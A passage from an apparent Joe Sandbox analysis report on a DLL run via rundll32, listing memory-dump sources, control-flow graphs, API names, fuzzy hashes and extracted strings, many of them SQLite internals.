                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: :memory:
                                                                                                                                                        • API String ID: 0-2920599690
                                                                                                                                                        • Opcode ID: 28f684d29f95435ac5f69af33a849bd5d511149b444771e687ef8d926133d3f6
                                                                                                                                                        • Instruction ID: 53aa976c5ca07b8d57d1e4295da19cf984914afd3a11e07ed7441440e09377d4
                                                                                                                                                        • Opcode Fuzzy Hash: 28f684d29f95435ac5f69af33a849bd5d511149b444771e687ef8d926133d3f6
                                                                                                                                                        • Instruction Fuzzy Hash: 10329C63B09B8286EB648B2595A0B7967A0FF45B84F194635DE7DC37D9EF3CE4908300
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                        • Opcode ID: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                        • Instruction ID: d7ed039d65f22e1e8b1eae9d8462d922bb4cc798b5200499a24e4302a897164f
                                                                                                                                                        • Opcode Fuzzy Hash: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                        • Instruction Fuzzy Hash: D8B1D966B4AB4785FF588B69A8B0A3823A0AF44B40F650735C97DC73ECEF6CE4558340
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                        • Instruction ID: a3a1ec3e2c6da6d23c7cf16e60051a761ee8b7f8a572d72f7cb235e82343eff4
                                                                                                                                                        • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                        • Instruction Fuzzy Hash: 9CC1A122B1868241FB558F258461B792791EF86F88F091232DEBEC73DEDFACD9418740

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 812 7ffdff155320-7ffdff15534c 813 7ffdff155361-7ffdff15536a 812->813 814 7ffdff15534e call 7ffdff291dd0 812->814 815 7ffdff155379-7ffdff15537d 813->815 816 7ffdff15536c 813->816 820 7ffdff155353-7ffdff155357 814->820 818 7ffdff15537f-7ffdff15538b call 7ffdff291840 815->818 819 7ffdff155395-7ffdff155398 815->819 816->815 828 7ffdff155611-7ffdff155614 818->828 829 7ffdff155391 818->829 824 7ffdff15539e-7ffdff1553e8 819->824 825 7ffdff155616-7ffdff155633 819->825 821 7ffdff15535d 820->821 822 7ffdff15566a-7ffdff155676 820->822 821->813 835 7ffdff15541f-7ffdff155421 824->835 836 7ffdff1553ea-7ffdff1553f9 824->836 827 7ffdff155638-7ffdff155647 825->827 830 7ffdff155653-7ffdff155659 827->830 831 7ffdff155649-7ffdff155650 827->831 828->825 828->827 829->819 833 7ffdff15565b 830->833 834 7ffdff155668 830->834 831->830 833->834 834->822 837 7ffdff155423-7ffdff155451 call 7ffdff291a30 835->837 838 7ffdff155456-7ffdff15545c 835->838 836->835 842 7ffdff1553fb-7ffdff15541d call 7ffdff291a30 836->842 845 7ffdff1555fd-7ffdff15560c 837->845 839 7ffdff1554ae-7ffdff1554c4 call 7ffdff164be0 838->839 840 7ffdff15545e-7ffdff155466 838->840 852 7ffdff1554d0-7ffdff155502 839->852 853 7ffdff1554c6-7ffdff1554cb 839->853 840->845 846 7ffdff15546c-7ffdff155470 call 7ffdff153a80 840->846 842->835 845->828 855 7ffdff155475-7ffdff155479 846->855 852->845 856 7ffdff155508 852->856 853->845 855->839 857 7ffdff15547b-7ffdff1554a9 call 7ffdff291a30 855->857 858 7ffdff155510-7ffdff155539 CreateFileMappingW 856->858 857->845 860 7ffdff1555b4-7ffdff1555eb call 7ffdff291a30 858->860 861 7ffdff15553b-7ffdff15557f MapViewOfFile 858->861 860->845 869 7ffdff1555ed-7ffdff1555f4 860->869 861->860 863 7ffdff155581-7ffdff1555ac 861->863 863->858 865 7ffdff1555b2 863->865 865->845 869->845
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CreateMappingView
                                                                                                                                                        • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                        • API String ID: 3452162329-2257004166
                                                                                                                                                        • Opcode ID: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                        • Instruction ID: c865c7c8d8fc05a715ee7d63795add074b3e1c6fd14ff528a6d987ceebc7825d
                                                                                                                                                        • Opcode Fuzzy Hash: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                        • Instruction Fuzzy Hash: 57917E76B18A4286EB648F25E460A6927A1FB84F98F594235CE7DC77E8EF3CD441C700

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1277 7ffdff153a80-7ffdff153a9a 1278 7ffdff153aae-7ffdff153ab4 1277->1278 1279 7ffdff153a9c-7ffdff153aad 1277->1279 1280 7ffdff153aca-7ffdff153ad3 1278->1280 1281 7ffdff153ab6-7ffdff153ac7 1278->1281 1282 7ffdff153adb 1280->1282 1283 7ffdff153ad5-7ffdff153ad9 1280->1283 1281->1280 1284 7ffdff153ade-7ffdff153b13 call 7ffdff292700 SetFilePointer 1282->1284 1283->1284 1287 7ffdff153b59-7ffdff153b6c SetEndOfFile 1284->1287 1288 7ffdff153b15-7ffdff153b24 1284->1288 1289 7ffdff153b6e-7ffdff153b80 1287->1289 1290 7ffdff153bab-7ffdff153bae 1287->1290 1288->1287 1297 7ffdff153b26-7ffdff153b57 call 7ffdff291a30 1288->1297 1289->1290 1298 7ffdff153b82-7ffdff153b8c 1289->1298 1291 7ffdff153bb0-7ffdff153bbd 1290->1291 1292 7ffdff153bc7-7ffdff153bdd 1290->1292 1295 7ffdff153bc2 call 7ffdff291b10 1291->1295 1296 7ffdff153bbf 1291->1296 1295->1292 1296->1295 1301 7ffdff153b91-7ffdff153ba9 call 7ffdff291a30 1297->1301 1298->1301 1301->1290 1301->1292
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                        • API String ID: 973152223-2471937615
                                                                                                                                                        • Opcode ID: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                        • Instruction ID: 439a811c0f45260a697af8fbff264bf5d46a1a728d7392c6a2cfb82500f38db8
                                                                                                                                                        • Opcode Fuzzy Hash: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                        • Instruction Fuzzy Hash: BC41A222F18A0686E7609F6AE46096973A1EB44B94F180336DE7DD77EDDF3CD4428700

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1551 7ffdff1536f0-7ffdff15371b 1552 7ffdff15371d-7ffdff153732 1551->1552 1553 7ffdff15376b-7ffdff153798 1551->1553 1555 7ffdff153754-7ffdff153768 call 7ffdff29cf10 1552->1555 1556 7ffdff153734 call 7ffdff29cf10 1552->1556 1554 7ffdff1537a0-7ffdff1537cb ReadFile 1553->1554 1557 7ffdff1537d1-7ffdff1537e1 1554->1557 1558 7ffdff153858-7ffdff15385a 1554->1558 1555->1553 1563 7ffdff153739 1556->1563 1557->1558 1569 7ffdff1537e3-7ffdff1537f6 1557->1569 1561 7ffdff15385c-7ffdff153883 call 7ffdff178730 1558->1561 1562 7ffdff153888-7ffdff153891 1558->1562 1561->1562 1562->1563 1567 7ffdff153897-7ffdff1538ac call 7ffdff29d5c0 1562->1567 1568 7ffdff15373b-7ffdff153753 1563->1568 1567->1568 1573 7ffdff153830-7ffdff153853 call 7ffdff291a30 1569->1573 1574 7ffdff1537f8-7ffdff1537fe 1569->1574 1573->1568 1576 7ffdff153800-7ffdff153804 1574->1576 1577 7ffdff153806-7ffdff153809 1574->1577 1576->1577 1579 7ffdff153812-7ffdff15382b 1576->1579 1577->1579 1580 7ffdff15380b-7ffdff153810 1577->1580 1579->1554 1580->1573 1580->1579
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                        • API String ID: 2738559852-1843600136
                                                                                                                                                        • Opcode ID: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                        • Instruction ID: f2a99a2004a0eec460e03fd64af96d09bc01cac8c11c9719e91b54edb9655619
                                                                                                                                                        • Opcode Fuzzy Hash: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                        • Instruction Fuzzy Hash: 2341CF32B1864286EB248F16E490DA9B762FB44B80F990336DA7DD76D8DF3CE4428340

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2190 7ffdff289c70-7ffdff289cb2 2191 7ffdff289ce0-7ffdff289ce2 2190->2191 2192 7ffdff289cb4-7ffdff289cba 2190->2192 2195 7ffdff289d61-7ffdff289d8b call 7ffdff202470 * 2 2191->2195 2196 7ffdff289ce4-7ffdff289ce8 2191->2196 2193 7ffdff289cc5-7ffdff289cc8 2192->2193 2194 7ffdff289cbc-7ffdff289cc0 2192->2194 2198 7ffdff289cca-7ffdff289cd0 2193->2198 2199 7ffdff289cd3-7ffdff289cd6 2193->2199 2197 7ffdff28a0d9-7ffdff28a0f5 call 7ffdff29bac0 2194->2197 2218 7ffdff289e2c-7ffdff289e4a 2195->2218 2219 7ffdff289d91-7ffdff289d99 2195->2219 2200 7ffdff289cea-7ffdff289cf0 call 7ffdff2885f0 2196->2200 2201 7ffdff289d4b-7ffdff289d4f 2196->2201 2198->2199 2199->2191 2209 7ffdff289cf5-7ffdff289cfa 2200->2209 2201->2195 2204 7ffdff289d51-7ffdff289d5c call 7ffdff286ac0 2201->2204 2204->2197 2212 7ffdff289cfc-7ffdff289d03 2209->2212 2213 7ffdff289d3e-7ffdff289d42 2209->2213 2216 7ffdff289d05-7ffdff289d14 call 7ffdff289420 2212->2216 2217 7ffdff289d21-7ffdff289d28 2212->2217 2213->2201 2215 7ffdff289d44-7ffdff289d46 2213->2215 2215->2197 2231 7ffdff289d16-7ffdff289d1c call 7ffdff28a160 2216->2231 2232 7ffdff289d2d-7ffdff289d30 2216->2232 2217->2197 2221 7ffdff289e56-7ffdff289e5f 2218->2221 2222 7ffdff289e4c-7ffdff289e52 2218->2222 2219->2218 2220 7ffdff289d9f-7ffdff289da6 2219->2220 2224 7ffdff289da8-7ffdff289daf 2220->2224 2225 7ffdff289db1-7ffdff289db5 2220->2225 2226 7ffdff289e60-7ffdff289e6d 2221->2226 2222->2221 2224->2225 2228 7ffdff289db7-7ffdff289dca call 7ffdff289420 2224->2228 2225->2218 2225->2228 2229 7ffdff289e7c 2226->2229 2230 7ffdff289e6f-7ffdff289e7a 2226->2230 2241 7ffdff289dcc-7ffdff289dd3 2228->2241 2242 7ffdff289ddd-7ffdff289ddf 2228->2242 2236 7ffdff289e7e-7ffdff289e80 2229->2236 2230->2236 2231->2217 2232->2215 2234 7ffdff289d32-7ffdff289d39 2232->2234 2234->2197 2239 7ffdff289ea7-7ffdff289eaa 2236->2239 2240 7ffdff289e82-7ffdff289ea1 RaiseException 2236->2240 2243 7ffdff289ebc 2239->2243 2244 7ffdff289eac-7ffdff289eaf 2239->2244 2240->2239 2241->2242 2247 7ffdff289e20-7ffdff289e23 2242->2247 2248 7ffdff289de1-7ffdff289dff call 7ffdff202470 call 7ffdff29ce10 2242->2248 2246 7ffdff289ec0-7ffdff289ec9 2243->2246 2244->2243 2245 7ffdff289eb1-7ffdff289eba 2244->2245 2245->2246 2246->2226 2249 7ffdff289ecb-7ffdff289ed4 2246->2249 2247->2218 2250 7ffdff289e25-7ffdff289e27 2247->2250 2270 7ffdff289e01-7ffdff289e0f call 7ffdff28a160 2248->2270 2271 7ffdff289e14-7ffdff289e1b 2248->2271 2252 7ffdff289ed6-7ffdff289ed9 2249->2252 2253 7ffdff289f2e 2249->2253 2254 7ffdff28a0d1 2250->2254 2256 7ffdff289edb-7ffdff289edd 2252->2256 2257 7ffdff289ee3-7ffdff289eeb 2252->2257 2259 7ffdff289f33-7ffdff289f35 2253->2259 2254->2197 2256->2257 2262 7ffdff289fab 2256->2262 2263 7ffdff289ef0-7ffdff289ef4 2257->2263 2260 7ffdff289f37-7ffdff289f47 2259->2260 2261 7ffdff289fb0-7ffdff289fb4 2259->2261 2265 7ffdff28a0c9 2260->2265 2268 7ffdff289fb6-7ffdff289fd5 2261->2268 2269 7ffdff289fe9-7ffdff289ffa 2261->2269 2262->2261 2266 7ffdff289ef6-7ffdff289f16 2263->2266 2267 7ffdff289f5c 2263->2267 2265->2254 2286 7ffdff289f18-7ffdff289f1b 2266->2286 2287 7ffdff289f4c-7ffdff289f5a 2266->2287 2272 7ffdff289f5e-7ffdff289f76 2267->2272 2288 7ffdff28a085-7ffdff28a08f 2268->2288 2289 7ffdff289fdb-7ffdff289fe3 2268->2289 2273 7ffdff28a03a-7ffdff28a03e 2269->2273 2274 7ffdff289ffc-7ffdff28a009 2269->2274 2270->2254 2271->2254 2277 7ffdff289fa5-7ffdff289fa9 2272->2277 2278 7ffdff289f78-7ffdff289f9f 2272->2278 2279 7ffdff28a040-7ffdff28a047 2273->2279 2280 7ffdff28a051-7ffdff28a05b 2273->2280 2274->2273 2290 7ffdff28a00b-7ffdff28a034 RaiseException 2274->2290 2277->2259 2278->2277 2279->2280 2284 7ffdff28a05d-7ffdff28a07d call 7ffdff202470 call 7ffdff29ce10 2280->2284 2285 7ffdff28a091-7ffdff28a095 2280->2285 2284->2285 2301 7ffdff28a07f-7ffdff28a083 2284->2301 2294 7ffdff28a097-7ffdff28a0bd 2285->2294 2295 7ffdff28a0c4 2285->2295 2286->2265 2293 7ffdff289f21-7ffdff289f28 2286->2293 2287->2272 2288->2265 2289->2269 2290->2273 2293->2263 2297 7ffdff289f2a 2293->2297 2294->2295 2295->2265 2297->2253 2301->2265
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                        • Instruction ID: 6816c610c58c79a9621771c167a1facb965bf8a060e6ceec7555aea2177cbf8c
                                                                                                                                                        • Opcode Fuzzy Hash: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                        • Instruction Fuzzy Hash: 31D16C22B0864686EB649F25D4A0B2D37A1EB44F89F149636DA7EC77D8DF3DE844C700
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$FIRST$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$LAST$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unsupported use of NULLS %s$views may not be indexed$virtual tables may not be indexed
                                                                                                                                                        • API String ID: 0-2483461966
                                                                                                                                                        • Opcode ID: 6a8868e36fc59c9c06d3edb5cabb7d98b9c7c5b10ae1b07c4c0c87acadf94d23
                                                                                                                                                        • Instruction ID: fb4e8ea7c47b6acea992445784b30492e35c2cec9baa132f53d8fd6bb87f6336
                                                                                                                                                        • Opcode Fuzzy Hash: 6a8868e36fc59c9c06d3edb5cabb7d98b9c7c5b10ae1b07c4c0c87acadf94d23
                                                                                                                                                        • Instruction Fuzzy Hash: 9DC2EE32B09B8696EB208B15D4A5ABA27A1FB45B94F554232DE7DC77E8DF3CE440C304
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: %s: "%s" - should this be a string literal in single-quotes?$%s: %s$%s: %s.%s$%s: %s.%s.%s$H$N$ROWID$ambiguous column name$coalesce$double-quoted string literal: "%w"$excluded$main$misuse of aliased aggregate %s$misuse of aliased window function %s$new$no such column$old$row value misused$z
                                                                                                                                                        • API String ID: 0-3187542301
                                                                                                                                                        • Opcode ID: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                        • Instruction ID: 4b3e0df71c5cfdec02531cbbf8001b4071ff2f24d12e2cd6b76778a558a45ea7
                                                                                                                                                        • Opcode Fuzzy Hash: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                        • Instruction Fuzzy Hash: E2C27E73F0868286EB648B1690A0A797BA1FB95B80F454375DABD837D9DF3CF4518B00
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                        • API String ID: 0-767664412
                                                                                                                                                        • Opcode ID: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                        • Instruction ID: c2c95384145145534a3243ed2785bcbb5853d8c53d7d82718a562fda2e631e74
                                                                                                                                                        • Opcode Fuzzy Hash: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                        • Instruction Fuzzy Hash: F9B138D3B305984BD7588A3EB822FDD1B85D3A5348F485239F655CFFC6E92AE5018702
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
